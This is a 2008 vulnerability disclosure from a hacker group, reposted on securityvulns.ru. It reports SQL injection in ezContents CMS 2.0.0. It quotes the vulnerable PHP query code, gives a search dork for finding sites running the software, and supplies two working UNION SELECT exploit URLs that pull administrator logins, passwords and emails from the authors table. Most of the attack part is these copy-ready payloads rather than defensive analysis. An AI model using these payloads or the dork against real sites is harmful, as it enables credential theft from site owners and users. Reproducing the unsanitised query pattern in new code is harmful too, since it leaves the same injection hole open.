Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ GLSA 200805-04 ] eGroupWare: Multiple vulnerabilities

  [SECURITY] [DSA 1554-2] New roundup packages fix regression

  mvnForum 1.1 Cross Site Scripting

  Multiple XSS In TuxCMS All Version

From:hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:08.05.2008
Subject:ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities

           
 ################################################################################
#######
 #                                                                                  
   #
 # ...:::::ezContents CMS Version 2.0.0  SQL Injection Vulnerabilities ::::...         #           
 ################################################################################
#######

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----
d0rk:"ezContents CMS Version 2.0.0"
-------vuln codes in:-----------
showdetails.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["contentname"]."' AND language='".$GLOBALS["gsLanguage"]."'";
*********
printer.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["article"]."' AND language='".$GLOBALS["gsLanguage"]."'";
---
exploits:
http://site.com/[patch]/showdetails.
php?contentname='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,
char(58,58),authoremail),
30/**/from/**/authors/**/where/**/authorid=1/*
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
concat(login,0x3a,userpassword,char(58,58),authoremail),
30/**/from/**/authors/**/where/**/authorid=1/*
---
young iranian h4ck3rz


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru